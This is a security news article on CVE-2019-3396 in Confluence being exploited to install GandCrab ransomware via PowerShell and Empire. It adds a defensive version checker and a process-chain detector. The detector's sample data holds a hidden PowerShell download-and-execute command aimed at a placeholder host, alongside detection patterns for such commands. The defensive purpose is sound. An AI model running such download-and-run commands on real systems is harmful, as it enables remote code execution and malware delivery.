Confluence is a Java-based web application used by thousands of companies worldwide.
The vulnerability, tracked as CVE-2019-3396, lies in the software's "Widget Connector", the component that lets users embed YouTube videos, Twitter content and other external pages.
Attackers exploit the vulnerability to plant malware, establish remote access and execute code on the server. According to the researchers, all versions of Confluence Server and Confluence Data Center before 6.6.12, 6.12.3, 6.13.3 and 6.14.2 are vulnerable and can therefore be abused to install GandCrab.
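The sentence above lists four fixed versions, one per maintained branch. The following is an added example, not code from the article or from Atlassian, that turns that statement into an inventory check: a version is reported as vulnerable when it is below the earliest listed fix for its own branch or a later branch. Two assumptions not stated on the page are made explicit in the comments: versions newer than every listed fix are treated as patched, and branches with no fix of their own (6.7 to 6.11) must reach the next branch's fix. The host names are constructed.

```python
# Added example (not from the original article): classify Confluence
# Server / Data Center version strings against the fixed versions the
# article lists for CVE-2019-3396 (6.6.12, 6.12.3, 6.13.3, 6.14.2).
# Assumption (not stated on the page): a version newer than every listed
# fix (a later 6.x branch or 7.x) is treated as patched, and a version in
# a branch with no listed fix (6.7 to 6.11) is held to the next branch's
# fix, so it is reported as vulnerable.
from typing import Dict, Tuple

FIXED_VERSIONS = ("6.6.12", "6.12.3", "6.13.3", "6.14.2")


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '6.13.1' into (6, 13, 1); missing components count as 0."""
    parts = [int(p) for p in text.strip().split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_vulnerable(version: str) -> bool:
    """True when the version is below the earliest fix for its branch or a later one."""
    fixed = sorted(parse_version(f) for f in FIXED_VERSIONS)
    v = parse_version(version)
    # The first fix whose major.minor branch is at or above this version's
    # branch is the release this install must be at or beyond.
    for f in fixed:
        if f[:2] >= v[:2]:
            return v < f
    # Newer than every listed fix: assumed patched (see lead-in).
    return False


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map host name -> 'VULNERABLE' / 'patched' for an inventory of versions."""
    return {host: ("VULNERABLE" if is_vulnerable(ver) else "patched")
            for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed sample inventory; these are not real hosts.
    sample = {"wiki-01": "6.6.11", "wiki-02": "6.6.12", "wiki-03": "6.9.0",
              "wiki-04": "6.13.3", "wiki-05": "6.14.1", "wiki-06": "6.15.0"}
    for host, status in triage(sample).items():
        print(f"{host}: {sample[host]} -> {status}")
```

Feed `triage()` the version strings your asset inventory already reports for each Confluence node; the function deliberately errs on the side of flagging, so a branch with no fix of its own comes back as vulnerable rather than unknown.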
According to a report by a security company, proof-of-concept exploit code for the vulnerability was released publicly on 10 April. The attackers wasted no time and used it in attacks right away; the researchers said the first victims appeared within the first week.
The malicious payload used against vulnerable Confluence servers downloads and executes a PowerShell script designed to deliver trojans. That script in turn downloads a customised version of the open-source PowerShell agent Empire.
The Empire agent is used to inject an executable file (len.exe) into the memory of the current process. The researchers found that this file is GandCrab 5.2, a ransomware strain that has infected many companies recently.
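The chain described in the two paragraphs above (Confluence's Java process launching PowerShell, which fetches and runs a further script) leaves a process-tree footprint that is easy to hunt for. The following is an added detection example, not code from the article or from the researchers it cites: it walks a list of process-creation events and flags PowerShell whose parent is a Java process, raising the score when the command line carries download-and-execute or hidden-window indicators. The event schema, field names and sample events are constructed for the example and do not correspond to any particular EDR or Sysmon format; the URL in the sample is a placeholder.

```python
# Added example (not from the original article): flag PowerShell spawned by a
# Java process, the execution chain described for the CVE-2019-3396 attacks.
# The event shape (host, pid, ppid, image, cmdline) is an assumption made for
# this example, not a real EDR or Sysmon schema.
import json
import re
from typing import Dict, List

# Constructed sample events: one Confluence-style chain and one benign build
# step where cmd.exe, not Java, launches PowerShell.
SAMPLE_EVENTS: List[Dict] = [
    {"host": "wiki-01", "pid": 4120, "ppid": 3300,
     "image": "C:\\Confluence\\jre\\bin\\java.exe",
     "cmdline": "java.exe -Dcatalina.base=C:\\Confluence org.apache.catalina.startup.Bootstrap start"},
    {"host": "wiki-01", "pid": 5288, "ppid": 4120,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/stage1.ps1')\""},
    {"host": "build-02", "pid": 7001, "ppid": 6990,
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c build.bat"},
    {"host": "build-02", "pid": 7010, "ppid": 7001,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File .\\package.ps1"},
]

# Parent images that a Confluence (Tomcat) instance runs under; assumed set.
JAVA_IMAGES = {"java.exe", "javaw.exe"}

# Common download-and-run and non-interactive PowerShell indicators.
DOWNLOAD_INDICATORS = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|"
    r"\bIEX\b|Invoke-Expression|https?://", re.IGNORECASE)
HIDDEN_INDICATORS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-enc\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_suspicious_chains(events: List[Dict]) -> List[Dict]:
    """Return one finding per powershell.exe whose parent is a Java process."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        parent = by_key.get((e["host"], e["ppid"]))
        if parent is None or basename(parent["image"]) not in JAVA_IMAGES:
            continue
        score = 1
        reasons = [f"powershell.exe spawned by {basename(parent['image'])}"]
        if DOWNLOAD_INDICATORS.search(e["cmdline"]):
            score += 1
            reasons.append("download/execute indicators in command line")
        if HIDDEN_INDICATORS.search(e["cmdline"]):
            score += 1
            reasons.append("hidden or non-interactive PowerShell flags")
        findings.append({"host": e["host"], "pid": e["pid"],
                         "parent_pid": e["ppid"], "score": score,
                         "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_chains(SAMPLE_EVENTS):
        print(json.dumps(finding))
```

A Java web server has no ordinary reason to launch PowerShell, so the parent-child relation alone is worth an alert on a Confluence host; the command-line indicators only raise the priority. The same rule transfers to Linux hosts by substituting the Java binary names and shell interpreters used there.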
GandCrab is in fact one of the most widespread ransomware families at present. It first appeared last January and has targeted a large number of users and businesses. Its creators also offer it to other criminal groups to carry out attacks.
Many ransomware families, GandCrab included, are usually spread through malicious Office documents attached to phishing emails.
Distribution by exploiting vulnerabilities in server software has been observed before, but in most such cases the attackers use this method to distribute cryptomining programs.
There is currently no tool available to decrypt files encrypted by GandCrab version 5.2.